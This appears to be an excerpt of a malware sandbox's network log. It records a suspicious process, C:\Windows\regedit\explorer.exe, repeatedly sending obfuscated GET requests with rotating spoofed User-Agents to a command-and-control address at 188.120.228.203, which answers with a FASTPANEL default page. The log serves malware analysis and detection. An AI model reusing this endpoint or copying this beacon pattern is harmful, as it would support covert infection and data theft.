                                              Nov 27, 2024 04:02:33.366122007 CET1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                                              Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                                              Nov 27, 2024 04:02:33.366132975 CET448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                                              Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                                              Nov 27, 2024 04:02:33.366143942 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:33.366302967 CET224INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.69
                                              Nov 27, 2024 04:02:33.366321087 CET1236INData Raw: 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 20 32 36 32 2e 33 35 36 20 33 38 31 2e 39 39 31 20 33 32 38 2e 39 39 43 32 38 37 2e 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36
                                              Data Ascii: 6 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996"
                                              Nov 27, 2024 04:02:33.486138105 CET1236INData Raw: 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09
                                              Data Ascii: lters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBl
                                              Nov 27, 2024 04:02:33.584337950 CET707OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:34.027124882 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                              4           192.168.2.9  49806        188.120.228.203  80                616  C:\Windows\regedit\explorer.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Nov 27, 2024 04:02:41.538192987 CET694OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:42.961347103 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:42.961366892 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:42.961410046 CET224INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:cente
                                              Nov 27, 2024 04:02:42.961421013 CET1236INData Raw: 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69
                                              Data Ascii: r;justify-content:center;min-height:100vh;min-width:100vw;padding:1rem}.window-main{background-color:#13151a;border-radius:.75rem;max-width:45.625rem}.window-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-
                                              Nov 27, 2024 04:02:42.961431980 CET224INData Raw: 64 64 69 6e 67 3a 33 2e 37 35 72 65 6d 20 38 2e 39 33 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 62 6f 64 79 7b 66
                                              Data Ascii: dding:3.75rem 8.9375rem}.window-main__title{font-size:2.25rem}.window-main__body{font-size:1.0625rem}.window-main__info{margin-bottom:1.875rem}.window-main__list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}
                                              Nov 27, 2024 04:02:42.961483955 CET1236INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                              Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
                                              Nov 27, 2024 04:02:42.961498022 CET1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                                              Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                                              Nov 27, 2024 04:02:42.961548090 CET448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                                              Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                                              Nov 27, 2024 04:02:42.961585045 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:42.961666107 CET1236INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
                                              Nov 27, 2024 04:02:43.081641912 CET1236INData Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                                              Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                                              Nov 27, 2024 04:02:43.103537083 CET670OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:43.559287071 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                              5           192.168.2.9  49827        188.120.228.203  80
                                              Timestamp  Bytes transferred  Direction  Data
                                              Nov 27, 2024 04:02:49.794919968 CET640OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:51.178966999 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:
                                              Nov 27, 2024 04:02:51.178983927 CET1236INData Raw: 31 30 30 25 7d 62 75 74 74 6f 6e 2c 6f 70 74 69 6f 6e 2c 73 65 6c 65 63 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 75 6c 20 6c
                                              Data Ascii: 100%}button,option,select{cursor:pointer}a{color:inherit;text-decoration:none}ul li{list-style:none}img{vertical-align:top}h1,h2,h3,h4,h5,h6{font-weight:inherit;font-size:inherit}.lock body{overflow:hidden;touch-action:none;-ms-scroll-chaining
                                              Nov 27, 2024 04:02:51.178996086 CET1236INData Raw: 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 31 30 70 78 3b 77 69 64 74 68 3a 34 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 69 6e
                                              Data Ascii: ;left:0;top:10px;width:4px;height:4px;border-radius:50%;background-color:#fff}.window-main__actions{display:flex;justify-content:center}.window-main__actions a{min-height:34px;border:2px solid #2b313d;display:flex;flex-direction:column;justify
                                              Nov 27, 2024 04:02:51.179064035 CET1236INData Raw: 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38
                                              Data Ascii: em)){.window-main{padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20re
                                              Nov 27, 2024 04:02:51.179076910 CET1236INData Raw: 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 30 2e 39 31 34 36 33 34 31 34 36 33 72 65 6d 20 2b 20 32 2e 39 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35
                                              Data Ascii: 25.625)}}@supports (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.926829268
                                              Nov 27, 2024 04:02:51.179089069 CET1236INData Raw: 39 30 32 34 34 72 65 6d 20 2b 20 30 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 30 2e 36 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 2e 35 36 32 35 72 65
                                              Data Ascii: 90244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75re
                                              Nov 27, 2024 04:02:51.179100990 CET1236INData Raw: 09 3c 70 61 74 68 20 64 3d 22 4d 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 43 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 32 37 36 2e 31 34 37 20 34 39 37 2e 34 34 38 20 32 35 37 2e 31 37 34 20 34 33 30 2e 38 31 34 43 32 33 38 2e 32 20 33
                                              Data Ascii: <path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g>
                                              Nov 27, 2024 04:02:51.179264069 CET1236INData Raw: 69 6c 74 65 72 31 5f 66 5f 32 30 30 31 5f 35 22 20 78 3d 22 36 33 2e 38 35 39 31 22 20 79 3d 22 31 34 36 2e 33 31 39 22 20 77 69 64 74 68 3d 22 33 39 34 2e 35 34 34 22 20 68 65 69 67 68 74 3d 22 34 32 36 2e 31 34 32 22 20 66 69 6c 74 65 72 55 6e
                                              Data Ascii: ilter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="Sou
                                              Nov 27, 2024 04:02:51.179275990 CET1236INData Raw: 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 22 3e 59 6f 75 20 61 72 65 20 61 63 63 65 73 73 69 6e 67 20 74 68 65 20 73 69 74 65 20 76 69 61 20 48 54 54 50 53 2c 20 62 75 74 20 74 68 65 20 73 69 74 65 20 64 6f 65 73 20
                                              Data Ascii: class="window-main__item">You are accessing the site via HTTPS, but the site does not have an SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.
                                              Nov 27, 2024 04:02:51.179291010 CET797INData Raw: 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73
                                              Data Ascii: eOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75
                                              Nov 27, 2024 04:02:51.379973888 CET14INData Raw: 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: body></html>
                                              Nov 27, 2024 04:02:51.382492065 CET616OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:51.843673944 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
